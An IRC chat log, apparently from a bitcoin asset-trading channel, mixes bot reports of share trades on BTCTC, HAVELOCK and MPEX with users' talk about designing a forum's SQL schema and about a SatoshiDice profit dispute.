[-] Jun 12 21:49:02 jcpham Jun 12 21:49:10 have you looked at btcguild Jun 12 21:49:28 [BTCTC] [TAT.ASICMINER] 12 @ 0.025098 = 0.3012 BTC [-] Jun 12 21:49:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [-] Jun 12 21:49:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.025 = 0.2 BTC [-] Jun 12 21:49:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 12 21:49:34 [BTCTC] [TAT.ASICMINER] 124 @ 0.0249 = 3.0876 BTC [-] Jun 12 21:49:48 0.00000155 BTC pps Jun 12 21:49:52 [BTCTC] [ASICMINER-PT] 1 @ 2.57 BTC [+] Jun 12 21:49:57 ;;seen mircea_popescu Jun 12 21:49:57 mircea_popescu was last seen in #bitcoin-assets 21 minutes and 10 seconds ago: giga's friend. Jun 12 21:50:14 mircea_popescu: So what if this is just the internet? Jun 12 21:50:38 I want to have discourse with MPOE-PR on this S.MG announcement heerrr Jun 12 21:51:17 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00738 = 0.738 BTC [-] Jun 12 21:54:09 [BTCTC] [TAT.ASICMINER] 18 @ 0.0249 = 0.4482 BTC [-] Jun 12 21:56:58 [BTCTC] [ASICMINER-PT] 1 @ 2.569998 BTC [-] Jun 12 21:58:01 [HAVELOCK] [ASICM] 8 @ 0.02567 = 0.2054 BTC [+] Jun 12 21:58:05 thestringpuller she is on this chan. Jun 12 22:01:23 [BTCTC] [B.YABMC] 1 @ 0.012499 BTC [+] Jun 12 22:01:42 [BTCTC] [DMS.PURCHASE] 50 @ 0.066163 = 3.3082 BTC [-] Jun 12 22:04:04 [MPEX] [S.MPOE] 12684 @ 0.00071748 = 9.1005 BTC [+] Jun 12 22:04:26 ;;seen mpoe-pr Jun 12 22:04:27 I have not seen mpoe-pr. Jun 12 22:04:38 kakobrekla: you like trolling me don't you Jun 12 22:04:40 [MPEX] [S.MPOE] 14809 @ 0.00071625 = 10.6069 BTC [-] Jun 12 22:04:41 [MPEX] [S.MPOE] 8541 @ 0.00071415 = 6.0996 BTC [-] Jun 12 22:05:11 well, its a different nick. Jun 12 22:08:00 [HAVELOCK] [SDICE] 1 @ 0.2395 BTC [+] Jun 12 22:08:08 orly? Jun 12 22:08:51 lol Jun 12 22:08:52 she must be Diablo-D3 Jun 12 22:10:06 [BTCTC] [ASICMINER-PT] 1 @ 2.5689 BTC [-] Jun 12 22:10:08 [BTCTC] [ASICMINER-PT] 1 @ 2.569 BTC [+] Jun 12 22:10:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 12 22:13:58 lol Jun 12 22:15:19 [BTCTC] [CRYPTO-TRADE] 3 @ 0.157 = 0.471 BTC [-] Jun 12 22:15:22 [BTCTC] [CRYPTO-TRADE] 3 @ 0.155 = 0.465 BTC [-] Jun 12 22:16:10 [BTCTC] [DMS.MINING] 50 @ 0.03 = 1.5 BTC [-] Jun 12 22:17:23 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00738 = 0.059 BTC [-] Jun 12 22:19:40 03:08:51] she must be Diablo-D3 Jun 12 22:19:41 wtf? Jun 12 22:19:52 LOL Jun 12 22:20:13 [BTCTC] [PAJKA.BOND] 1 @ 0.0875 BTC [-] Jun 12 22:20:35 just joshin' Jun 12 22:20:37 sorry Jun 12 22:21:37 i was referring to your eloquent and poignant rhetoric we are often graced with Jun 12 22:21:37 okay so guys Jun 12 22:21:48 lets say Im writing forum from scratch Jun 12 22:21:59 and Im doing the sql schema right now Jun 12 22:22:14 ew Jun 12 22:22:44 I have the following tables Jun 12 22:22:51 Use an ORM Jun 12 22:23:00 users, forums, threads, posts, messages, thread subscriptions, and forum subscriptions Jun 12 22:23:03 [HAVELOCK] [ASICM] 214109 @ 0.00034469 = 73.8012 BTC [-] Jun 12 22:23:05 parseval_: I hate ORMs Jun 12 22:23:10 :) Jun 12 22:23:22 other than acl, have I missed any features? Jun 12 22:24:46 reputation? Jun 12 22:25:03 [HAVELOCK] [ASICM] 40 @ 0.0253001 = 1.012 BTC [+] Jun 12 22:25:07 parseval_: maybe Jun 12 22:25:14 not sure Im going to add that feature Jun 12 22:25:19 it only causes drama on forums Jun 12 22:25:42 [15:23] <@assbot> [HAVELOCK] [ASICM] 214109 @ 0.00034469 = 73.8012 BTC [-] <<< kakobrekla, is it possible to add [DIVIDEND] or such to that message? Jun 12 22:26:04 I want webforum software thats not shit Jun 12 22:26:06 what about Ignore List Jun 12 22:26:11 ThickAsThieves: hrm, maybe Jun 12 22:26:17 ignore lists are largely abused too Jun 12 22:26:18 [HAVELOCK] [ASICM] 7 @ 0.02564 = 0.1795 BTC [+] Jun 12 22:26:24 [HAVELOCK] [ASICM] 11 @ 0.0253 = 0.2783 BTC [-] Jun 12 22:26:26 [HAVELOCK] [ASICM] 9 @ 0.02521 = 0.2269 BTC [-] Jun 12 22:26:27 [HAVELOCK] [ASICM] 48 @ 0.02510001 = 1.2048 BTC [-] Jun 12 22:26:28 if someone needs to be ignored, they probably should just be banned Jun 12 22:26:28 [HAVELOCK] [ASICM] 100 @ 0.02509999 = 2.51 BTC [-] Jun 12 22:26:29 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [-] Jun 12 22:26:30 [HAVELOCK] [ASICM] 1 @ 0.02505 BTC [-] Jun 12 22:26:31 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] Jun 12 22:26:32 [HAVELOCK] [ASICM] 38 @ 0.025 = 0.95 BTC [-] Jun 12 22:26:33 [HAVELOCK] [ASICM] 230 @ 0.025 = 5.75 BTC [-] Jun 12 22:26:35 [HAVELOCK] [ASICM] 1 @ 0.02564 BTC [+] Jun 12 22:26:47 friend list would be nice, too, to follow people's posts Jun 12 22:26:57 ahh, a friend list Jun 12 22:27:08 [HAVELOCK] [ASICM] 13 @ 0.02563 = 0.3332 BTC [-] Jun 12 22:27:09 shit i think i pushed it wrong ThickAsThieves Jun 12 22:27:13 i sent it as a trade instead of a payment Jun 12 22:27:28 does that hurt anything? Jun 12 22:27:32 [BTCTC] [ASICMINER-PT] 1 @ 2.569 BTC [+] Jun 12 22:27:38 im going to manually push the dividend announcement again (NOTE THIS IS ONLY THE ANNOUNCEMENT, NOT AN ACTUAL REPAYMENT) Jun 12 22:27:54 [BTCTC] [ASICMINER-PT] 5 @ 2.569 = 12.845 BTC [+] Jun 12 22:27:56 [HAVELOCK] [ASICM] [PAID] 0.00034469 BTC to 214`122 shares, 0 satoshi per share Jun 12 22:28:09 hmm Jun 12 22:28:11 [HAVELOCK] [ASICM] 216 @ 0.025 = 5.4 BTC [-] Jun 12 22:28:29 btw, Im probably not going to have avatar management Jun 12 22:28:49 then why use the forum at all? Jun 12 22:29:03 i guess it wants the total value paid, and it calculates the per share Jun 12 22:29:10 for the announcement... fixing. Jun 12 22:29:23 [HAVELOCK] [ASICM] [PAID] 73.80571218 BTC to 214`122 shares, 34469 satoshi per share Jun 12 22:29:31 [HAVELOCK] [ASICM] 3 @ 0.0256 = 0.0768 BTC [+] Jun 12 22:29:32 ThickAsThieves: why have 9000 avatars when I can just pass through gravatar instead Jun 12 22:29:49 [HAVELOCK] [ASICM] 2 @ 0.0256 = 0.0512 BTC [+] Jun 12 22:30:05 there we go Jun 12 22:30:29 [BTCTC] [TAT.ASICMINER] 8 @ 0.0251 = 0.2008 BTC [+] Jun 12 22:30:43 Diablo-D3 why not just start from a package you don'ty like and fix everything they're doing wrong Jun 12 22:30:54 [HAVELOCK] [ASICM] 100 @ 0.025 = 2.5 BTC [-] Jun 12 22:30:58 like phpbb or w/e Jun 12 22:31:04 [BTCTC] [ASICMINER-PT] 1 @ 2.568 BTC [-] Jun 12 22:31:16 mircea_popescu: because they wrote it in the wrong language. Jun 12 22:31:26 you were asking about db schematics Jun 12 22:31:28 all three major forum webapps are written in php Jun 12 22:31:43 mircea_popescu: yes, and have you seen how bloated, say, phpbb's is? Jun 12 22:31:44 its nuts Jun 12 22:31:50 so take their scheme and cut Jun 12 22:31:50 they clearly dont know how to use sql or even code Jun 12 22:31:58 is what i mean. Jun 12 22:32:11 yeah, no point Jun 12 22:32:16 their schema design is wrong to begin with Jun 12 22:32:21 what forum is this anyway? Jun 12 22:32:34 ThickAsThieves: er, its software Jun 12 22:32:39 you use it to run your own forum Jun 12 22:32:49 word Jun 12 22:33:16 erlang + postgresql == win Jun 12 22:33:18 [BTCTC] [TAT.ASICMINER] 155 @ 0.0251 = 3.8905 BTC [+] Jun 12 22:33:21 [HAVELOCK] [ASICM] 2 @ 0.02500001 = 0.05 BTC [+] Jun 12 22:33:22 [HAVELOCK] [ASICM] 54 @ 0.025 = 1.35 BTC [-] Jun 12 22:33:24 [HAVELOCK] [ASICM] 20 @ 0.025 = 0.5 BTC [-] Jun 12 22:33:25 [HAVELOCK] [ASICM] 195 @ 0.025 = 4.875 BTC [-] Jun 12 22:33:26 [HAVELOCK] [ASICM] 100 @ 0.02492001 = 2.492 BTC [-] Jun 12 22:33:27 [HAVELOCK] [ASICM] 75 @ 0.0249 = 1.8675 BTC [-] Jun 12 22:34:39 [HAVELOCK] [ASICM] 15 @ 0.0255 = 0.3825 BTC [+] Jun 12 22:36:51 [BTCTC] [PAJKA.BOND] 1 @ 0.088 BTC [+] Jun 12 22:36:54 [HAVELOCK] [ASICM] 1 @ 0.0256 BTC [+] Jun 12 22:37:03 [HAVELOCK] [ASICM] 1 @ 0.02545 BTC [-] Jun 12 22:37:04 [HAVELOCK] [ASICM] 40 @ 0.02545 = 1.018 BTC [-] Jun 12 22:39:45 [HAVELOCK] [ASICM] 7 @ 0.02544 = 0.1781 BTC [-] Jun 12 22:43:09 [HAVELOCK] [ASICM] 6 @ 0.0254 = 0.1524 BTC [-] Jun 12 22:43:27 http://pastebin.com/mePaqsdA Jun 12 22:43:31 thats the schema thus far Jun 12 22:43:51 no indexes done yet Jun 12 22:44:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 12 22:45:36 [HAVELOCK] [ASICM] 1 @ 0.0252 BTC [-] Jun 12 22:45:38 [HAVELOCK] [ASICM] 4 @ 0.025 = 0.1 BTC [-] Jun 12 22:45:39 [HAVELOCK] [ASICM] 50 @ 0.024915 = 1.2458 BTC [-] Jun 12 22:45:40 [HAVELOCK] [ASICM] 3 @ 0.02491 = 0.0747 BTC [-] Jun 12 22:45:41 [HAVELOCK] [ASICM] 17 @ 0.024905 = 0.4234 BTC [-] Jun 12 22:45:42 ThickAsThieves its not implemented right on their side Jun 12 22:46:33 [HAVELOCK] [ASICM] 15 @ 0.02535 = 0.3803 BTC [+] Jun 12 22:46:33 you know, I love laptops Jun 12 22:46:39 its easier to multitask Jun 12 22:46:42 [BTCTC] [ASICMINER-PT] 1 @ 2.5401 BTC [-] Jun 12 22:47:04 [HAVELOCK] [ASICM] 3 @ 0.02529999 = 0.0759 BTC [-] Jun 12 22:47:05 Diablo-D3: maybe a parentID on forums if you need subforums Jun 12 22:47:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.0251 = 0.0502 BTC [+] Jun 12 22:47:23 hrm, true Jun 12 22:47:24 also isnt TIME a special word in postgres Jun 12 22:47:54 [BTCTC] [TAT.ASICMINER] 32 @ 0.0251 = 0.8032 BTC [+] Jun 12 22:48:14 ll: dont think so. Jun 12 22:48:24 I havent validated it in pg yet Jun 12 22:52:20 [HAVELOCK] [ASICM] 70 @ 0.02519 = 1.7633 BTC [-] Jun 12 22:54:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.0251 = 0.0502 BTC [+] Jun 12 22:55:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.0251 = 0.1255 BTC [+] Jun 12 22:55:29 [HAVELOCK] [ASICM] 10 @ 0.0252 = 0.252 BTC [+] Jun 12 22:55:29 Are we discussing Evoohees "announcement" in here? Jun 12 22:55:38 [BTCTC] [PAJKA.BOND] 1 @ 0.088 BTC [+] Jun 12 22:55:48 truffles: I have a mbp retina Jun 12 22:55:49 [HAVELOCK] [ASICM] 11 @ 0.025 = 0.275 BTC [-] Jun 12 22:55:50 Diablo-D3: instead of redoing phpbb i'd like to see reddit/ycombinator voting functionality. cuz they are much more bloated/arcane than phpbb. Jun 12 22:55:52 the touchpad is fucking HUGE Jun 12 22:56:02 jurov: hrrrrrrmmmmm Jun 12 22:56:05 that'd be interesting Jun 12 22:56:16 truffles: my problem is they were always too fucking small Jun 12 22:56:25 [HAVELOCK] [ASICM] 4 @ 0.025 = 0.1 BTC [-] Jun 12 22:56:32 apple fixed that bug, surprisingly Jun 12 22:56:42 peterl: what did he announce? Jun 12 22:56:44 I have fucking huge hands Jun 12 22:56:50 I swat B52s out of the sky like a baus Jun 12 22:57:14 he says he has a "loan" to SatoshiDice and will take 6100 btc out of next months profit Jun 12 22:57:22 [HAVELOCK] [VTX] 1 @ 0.4879 BTC [+] Jun 12 22:57:37 [HAVELOCK] [ASICM] 8 @ 0.025 = 0.2 BTC [-] Jun 12 22:57:44 [BTCTC] [PAJKA.BOND] 1 @ 0.088 BTC [+] Jun 12 22:57:53 [HAVELOCK] [ASICM] 5 @ 0.025 = 0.125 BTC [-] Jun 12 22:58:07 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] Jun 12 22:58:09 [HAVELOCK] [ASICM] 21 @ 0.025 = 0.525 BTC [-] Jun 12 22:58:13 MPOE-PR says his plan is breaking the contract Jun 12 22:59:03 peterl: link? Jun 12 22:59:17 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] Jun 12 22:59:28 [HAVELOCK] [ASICM] 21 @ 0.024905 = 0.523 BTC [-] Jun 12 22:59:38 lol. Jun 12 22:59:41 [BTCTC] [ASICMINER-PT] 1 @ 2.568 BTC [+] Jun 12 22:59:49 https://bitcointalk.org/index.php?topic=101902.msg2452138#msg2452138 Jun 12 23:00:41 jurov has a point, something like that'd be good. also something like tech crunch Jun 12 23:01:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 12 23:02:24 [BTCTC] [ASICMINER-PT] 1 @ 2.568 BTC [+] Jun 12 23:02:25 [BTCTC] [ASICMINER-PT] 18 @ 2.56899 = 46.2418 BTC [+] Jun 12 23:02:30 [BTCTC] [ASICMINER-PT] 10 @ 2.569 = 25.69 BTC [+] Jun 12 23:02:47 [BTCTC] [ASICMINER-PT] 5 @ 2.569999 = 12.85 BTC [+] Jun 12 23:02:54 [BTCTC] [ASICMINER-PT] 4 @ 2.57 = 10.28 BTC [+] Jun 12 23:03:09 [BTCTC] [ASICMINER-PT] 50 @ 2.57 = 128.5 BTC [+] Jun 12 23:04:18 [BTCTC] [S.DICE-PT] 1 @ 0.002888 BTC [-] Jun 12 23:05:25 [BTCTC] [DMS.MINING] 6 @ 0.03298 = 0.1979 BTC [+] Jun 12 23:05:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.0252 = 0.1008 BTC [+] Jun 12 23:05:34 [BTCTC] [TAT.ASICMINER] 26 @ 0.0255 = 0.663 BTC [+] Jun 12 23:05:48 [MPEX] [S.MPOE] 6816 @ 0.00071748 = 4.8903 BTC [+] Jun 12 23:05:49 [MPEX] [S.MPOE] 4784 @ 0.00071768 = 3.4334 BTC [+] Jun 12 23:06:38 [HAVELOCK] [ASICM] 2 @ 0.02519 = 0.0504 BTC [+] Jun 12 23:06:43 dont think I want to add sigs Jun 12 23:07:40 [BTCTC] [ASICMINER-PT] 1 @ 2.57399 BTC [+] Jun 12 23:07:56 [BTCTC] [ASICMINER-PT] 3 @ 2.574 = 7.722 BTC [+] Jun 12 23:08:00 [BTCTC] [TAT.ASICMINER] 7 @ 0.0252 = 0.1764 BTC [-] Jun 12 23:08:01 [BTCTC] [S.MPOE-PT] 85 @ 0.000651 = 0.0553 BTC [-] Jun 12 23:08:10 [BTCTC] [S.MPOE-PT] 150 @ 0.00065 = 0.0975 BTC [-] Jun 12 23:08:19 [BTCTC] [S.MPOE-PT] 12 @ 0.00065 = 0.0078 BTC [-] Jun 12 23:08:25 [BTCTC] [S.MPOE-PT] 2 @ 0.000638 = 0.0013 BTC [-] Jun 12 23:08:34 no avatars? no sigs? srsly? Jun 12 23:08:39 [BTCTC] [S.MPOE-PT] 655 @ 0.000637 = 0.4172 BTC [-] Jun 12 23:08:48 I didnt say no avatars Jun 12 23:08:52 at least put there trollbox Jun 12 23:08:53 just no avatars in the softwarr Jun 12 23:08:59 it'll just use gravatars Jun 12 23:09:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.025201 = 0.0504 BTC [+] Jun 12 23:09:54 [HAVELOCK] [ASICM] 3 @ 0.02519 = 0.0756 BTC [+] Jun 12 23:09:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.0255 = 0.0765 BTC [+] Jun 12 23:10:08 [BTCTC] [TAT.ASICMINER] 18 @ 0.025201 = 0.4536 BTC [-] Jun 12 23:10:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.0252 = 0.0504 BTC [-] Jun 12 23:11:26 [BTCTC] [TAT.ASICMINER] 7 @ 0.0251 = 0.1757 BTC [-] Jun 12 23:11:44 [HAVELOCK] [ASICM] 23 @ 0.0252 = 0.5796 BTC [+] Jun 12 23:12:01 [BTCTC] [S.DICE-PT] 35 @ 0.002788 = 0.0976 BTC [-] Jun 12 23:12:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 12 23:12:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.024902 BTC [-] Jun 12 23:12:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.024901 BTC [-] Jun 12 23:12:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.024901 BTC [-] Jun 12 23:12:43 [BTCTC] [TAT.ASICMINER] 13 @ 0.024901 = 0.3237 BTC [-] Jun 12 23:12:48 [BTCTC] [TAT.ASICMINER] 46 @ 0.0249 = 1.1454 BTC [-] Jun 12 23:12:56 [BTCTC] [TAT.ASICMINER] 8 @ 0.0255 = 0.204 BTC [+] Jun 12 23:13:04 [BTCTC] [TAT.ASICMINER] 23 @ 0.0255 = 0.5865 BTC [+] Jun 12 23:13:19 [BTCTC] [TAT.ASICMINER] 11 @ 0.0256 = 0.2816 BTC [+] Jun 12 23:13:35 [BTCTC] [ASICMINER-PT] 1 @ 2.574 BTC [+] Jun 12 23:13:40 [BTCTC] [ASICMINER-PT] 2 @ 2.575 = 5.15 BTC [+] Jun 12 23:13:46 [BTCTC] [ASICMINER-PT] 3 @ 2.576 = 7.728 BTC [+] Jun 12 23:13:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.0256 = 0.256 BTC [+] Jun 12 23:13:54 [BTCTC] [ASICMINER-PT] 1 @ 2.578 BTC [+] Jun 12 23:14:00 [BTCTC] [ASICMINER-PT] 1 @ 2.579 BTC [+] Jun 12 23:14:29 [BTCTC] [TAT.ASICMINER] 15 @ 0.0256 = 0.384 BTC [+] Jun 12 23:14:49 [HAVELOCK] [ASICM] 1 @ 0.0252 BTC [+] Jun 12 23:15:53 [HAVELOCK] [ASICM] 11 @ 0.02519 = 0.2771 BTC [-] Jun 12 23:16:08 [HAVELOCK] [ASICM] 3 @ 0.0251 = 0.0753 BTC [-] Jun 12 23:16:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.02525 BTC [-] Jun 12 23:16:33 [HAVELOCK] [ASICM] 1 @ 0.02519 BTC [+] Jun 12 23:16:51 [BTCTC] [ASICMINER-PT] 1 @ 2.579 BTC [+] Jun 12 23:17:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.02525 = 0.0505 BTC [-] Jun 12 23:18:21 [BTCTC] [DMS.MINING] 1 @ 0.03298 BTC [+] Jun 12 23:18:35 [BTCTC] [TAT.ASICMINER] 32 @ 0.02525 = 0.808 BTC [-] Jun 12 23:18:37 [BTCTC] [S.DICE-PT] 1 @ 0.002888 BTC [+] Jun 12 23:19:08 [HAVELOCK] [HIM] 2 @ 0.2815 = 0.563 BTC [+] Jun 12 23:19:40 [HAVELOCK] [SDICE] 1 @ 0.2156 BTC [-] Jun 12 23:20:15 [HAVELOCK] [ASICM] 10 @ 0.02519 = 0.2519 BTC [+] Jun 12 23:21:09 [HAVELOCK] [ASICM] 1 @ 0.02519 BTC [+] Jun 12 23:21:50 [HAVELOCK] [HIM] 5 @ 0.2815 = 1.4075 BTC [+] Jun 12 23:22:50 [HAVELOCK] [ASICM] 6 @ 0.02518999 = 0.1511 BTC [-] Jun 12 23:24:00 [BTCTC] [ASICMINER-PT] 1 @ 2.579 BTC [+] Jun 12 23:24:21 [BTCTC] [ASICMINER-PT] 3 @ 2.57 = 7.71 BTC [-] Jun 12 23:25:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.02525 = 0.0505 BTC [-] Jun 12 23:25:19 [BTCTC] [TAT.ASICMINER] 38 @ 0.02525 = 0.9595 BTC [-] Jun 12 23:26:29 good to be out of s.dice Jun 12 23:26:41 [BTCTC] [TAT.ASICMINER] 6 @ 0.0256 = 0.1536 BTC [+] Jun 12 23:27:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0256 BTC [+] Jun 12 23:29:40 [HAVELOCK] [ASICM] 1 @ 0.02519 BTC [+] Jun 12 23:29:42 [HAVELOCK] [ASICM] 5 @ 0.02519 = 0.126 BTC [+] Jun 12 23:29:47 lol, yes. Jun 12 23:30:26 [HAVELOCK] [ASICM] 50 @ 0.02519 = 1.2595 BTC [+] Jun 12 23:30:41 [BTCTC] [TAT.ASICMINER] 14 @ 0.0256 = 0.3584 BTC [+] Jun 12 23:30:43 [HAVELOCK] [ASICM] 2 @ 0.02519 = 0.0504 BTC [+] Jun 12 23:31:11 [BTCTC] [TAT.ASICMINER] 43 @ 0.0256 = 1.1008 BTC [+] Jun 12 23:31:15 [BTCTC] [ASICMINER-PT] 1 @ 2.56487 BTC [-] Jun 12 23:31:16 [BTCTC] [TAT.ASICMINER] 31 @ 0.0256 = 0.7936 BTC [+] Jun 12 23:31:35 [BTCTC] [ASICMINER-PT] 1 @ 2.540101 BTC [-] Jun 12 23:31:39 [BTCTC] [ASICMINER-PT] 1 @ 2.5401 BTC [-] Jun 12 23:31:44 [BTCTC] [ASICMINER-PT] 1 @ 2.538 BTC [-] Jun 12 23:31:52 !ticker m s.dice Jun 12 23:31:53 [MPEX:S.DICE] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.00205001 / 0.00242318 / 0.00249793 (13788 shares, 33.41 BTC), 30D: 0.00135 / 0.00217819 / 0.00329988 (300992 shares, 655.62 BTC) Jun 12 23:31:55 [BTCTC] [TAT.ASICMINER] 50 @ 0.0256 = 1.28 BTC [+] Jun 12 23:31:56 [BTCTC] [ASICMINER-PT] 1 @ 2.535 BTC [-] Jun 12 23:32:11 [BTCTC] [ASICMINER-PT] 1 @ 2.531 BTC [-] Jun 12 23:32:14 [BTCTC] [TAT.ASICMINER] 9 @ 0.0256 = 0.2304 BTC [+] Jun 12 23:32:22 [BTCTC] [ASICMINER-PT] 1 @ 2.521 BTC [-] Jun 12 23:32:33 [BTCTC] [ASICMINER-PT] 1 @ 2.5151 BTC [-] Jun 12 23:37:37 [BTCTC] [DMS.MINING] 50 @ 0.032987 = 1.6494 BTC [+] Jun 12 23:37:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.02552 = 0.1276 BTC [-] Jun 12 23:37:58 [BTCTC] [COGNITIVE] 1 @ 0.299999 BTC [+] Jun 12 23:38:59 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [+] Jun 12 23:40:00 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [+] Jun 12 23:40:44 [HAVELOCK] [VTX] 2 @ 0.4601 = 0.9202 BTC [-] Jun 12 23:41:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.02552 BTC [-] Jun 12 23:41:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.02552 BTC [-] Jun 12 23:41:49 https://bitcointalk.org/index.php?topic=101902.msg2455170#msg2455170 looks like Evoorhees is changing his mind Jun 12 23:41:58 [BTCTC] [TAT.ASICMINER] 45 @ 0.02552 = 1.1484 BTC [-] Jun 12 23:42:01 [HAVELOCK] [ASICM] 5 @ 0.0251 = 0.1255 BTC [-] Jun 12 23:42:47 [BTCTC] [TAT.ASICMINER] 5 @ 0.02526 = 0.1263 BTC [-] Jun 12 23:42:51 blah no cheap shares :( Jun 12 23:45:43 [HAVELOCK] [ASICM] 1 @ 0.0251 BTC [-] Jun 12 23:46:03 yeah Jun 12 23:46:12 cuz he can just win with the secret numner Jun 12 23:46:18 [HAVELOCK] [ASICM] 5 @ 0.0251 = 0.1255 BTC [-] Jun 12 23:46:18 and take whatever amount of money he chooses Jun 12 23:46:31 he was just trying to be more legitimate about it Jun 12 23:47:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.02552 = 0.0766 BTC [+] Jun 12 23:47:14 [BTCTC] [TAT.ASICMINER] 27 @ 0.02552 = 0.689 BTC [+] Jun 12 23:47:44 [HAVELOCK] [ASICM] 31 @ 0.0251 = 0.7781 BTC [-] Jun 12 23:47:57 [BTCTC] [ASICMINER-PT] 1 @ 2.566 BTC [+] Jun 12 23:48:36 [BTCTC] [ASICMINER-PT] 1 @ 2.565 BTC [-] Jun 12 23:49:03 [BTCTC] [ASICMINER-PT] 2 @ 2.52 = 5.04 BTC [-] Jun 12 23:49:12 [BTCTC] [ASICMINER-PT] 1 @ 2.5101 BTC [-] Jun 12 23:49:35 [BTCTC] [ASICMINER-PT] 1 @ 2.5093 BTC [-] Jun 12 23:49:38 I dunno, Evoorhess suggesting this and then changing his mind might shake some people, so there might still be cheap shares Jun 12 23:49:43 [BTCTC] [ASICMINER-PT] 3 @ 2.503 = 7.509 BTC [-] Jun 12 23:49:51 [BTCTC] [ASICMINER-PT] 30 @ 2.502 = 75.06 BTC [-] Jun 12 23:49:59 [BTCTC] [ASICMINER-PT] 1 @ 2.501002 BTC [-] Jun 12 23:50:04 [BTCTC] [ASICMINER-PT] 2 @ 2.5001 = 5.0002 BTC [-] Jun 12 23:50:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.02552 BTC [+] Jun 12 23:51:03 [BTCTC] [TAT.ASICMINER] 14 @ 0.02552 = 0.3573 BTC [+] Jun 12 23:51:54 [HAVELOCK] [HIM] 3 @ 0.2934 = 0.8802 BTC [+] Jun 12 23:52:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.02552 = 0.051 BTC [+] Jun 12 23:53:00 [BTCTC] [ASICMINER-PT] 1 @ 2.5589 BTC [+] Jun 12 23:54:24 [HAVELOCK] [ASICM] 17 @ 0.0251 = 0.4267 BTC [-] Jun 12 23:54:30 Im confused about what the IPO was for if the whole thing is run out of his pocket Jun 12 23:55:26 but the whole 'fuck shareholders its mine' deal is no surprise Jun 12 23:55:26 [BTCTC] [BTC-BOND] 1 @ 0.009993 BTC [+] Jun 12 23:55:31 [BTCTC] [ASICMINER-PT] 1 @ 2.5093 BTC [-] Jun 12 23:56:02 [HAVELOCK] [ASICM] 5 @ 0.0251 = 0.1255 BTC [-] Jun 12 23:56:18 meh. Jun 12 23:57:14 [BTCTC] [DMS.MINING] 30 @ 0.032989 = 0.9897 BTC [+] Jun 12 23:57:16 [BTCTC] [TAT.ASICMINER] 12 @ 0.02552 = 0.3062 BTC [+] Jun 12 23:57:41 [BTCTC] [TAT.ASICMINER] 50 @ 0.02552 = 1.276 BTC [+] Jun 12 23:58:07 anybody know the dividend status of g.asicminer.pt on bitfunder? Jun 12 23:58:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.02552 BTC [+] Jun 12 23:58:29 [BTCTC] [DMS.MINING] 8 @ 0.03299 = 0.2639 BTC [+] Jun 12 23:58:32 asicfiend not seen anything, but prolly happening soon. Jun 12 23:58:45 mk, thanks Jun 12 23:59:33 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [-] Jun 12 23:59:48 [MPEX] [S.MPOE] 6887 @ 0.00071768 = 4.9427 BTC [+] Jun 13 00:02:53 [BTCTC] [DMS.MINING] 10 @ 0.03299 = 0.3299 BTC [+] Jun 13 00:04:12 it doesnt look like Erik backed down to me Jun 13 00:04:20 seems like he rearrenged his approach Jun 13 00:04:29 and still feels owed Jun 13 00:05:23 [HAVELOCK] [ASICM] 3 @ 0.02500001 = 0.075 BTC [-] Jun 13 00:05:23 [HAVELOCK] [ASICM] 4 @ 0.02500001 = 0.1 BTC [-] Jun 13 00:05:24 [HAVELOCK] [ASICM] 4 @ 0.025 = 0.1 BTC [-] Jun 13 00:05:24 [HAVELOCK] [ASICM] 189 @ 0.025 = 4.725 BTC [-] Jun 13 00:05:24 [HAVELOCK] [ASICM] 98 @ 0.02509999 = 2.4598 BTC [+] Jun 13 00:06:51 [HAVELOCK] [ASICM] 33 @ 0.02509999 = 0.8283 BTC [+] Jun 13 00:07:35 [BTCTC] [ASICMINER-PT] 1 @ 2.5199 BTC [+] Jun 13 00:08:16 [BTCTC] [ASICMINER-PT] 1 @ 2.5199 BTC [+] Jun 13 00:08:20 [HAVELOCK] [ASICM] 33 @ 0.02509999 = 0.8283 BTC [+] Jun 13 00:09:43 [BTCTC] [DMS.MINING] 4 @ 0.03299 = 0.132 BTC [+] Jun 13 00:10:13 dub the problem moreover is, makes no sense for the shareholders to be "responsible" for the running capital. it's on management's head by default, seeing how management controls the keys. Jun 13 00:10:28 otherwise what, three months down the road "sorry guise, we had a breakin" a la vircurex ? Jun 13 00:10:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0255 BTC [-] Jun 13 00:11:32 [HAVELOCK] [ASICM] 1 @ 0.02509999 BTC [+] Jun 13 00:11:50 [BTCTC] 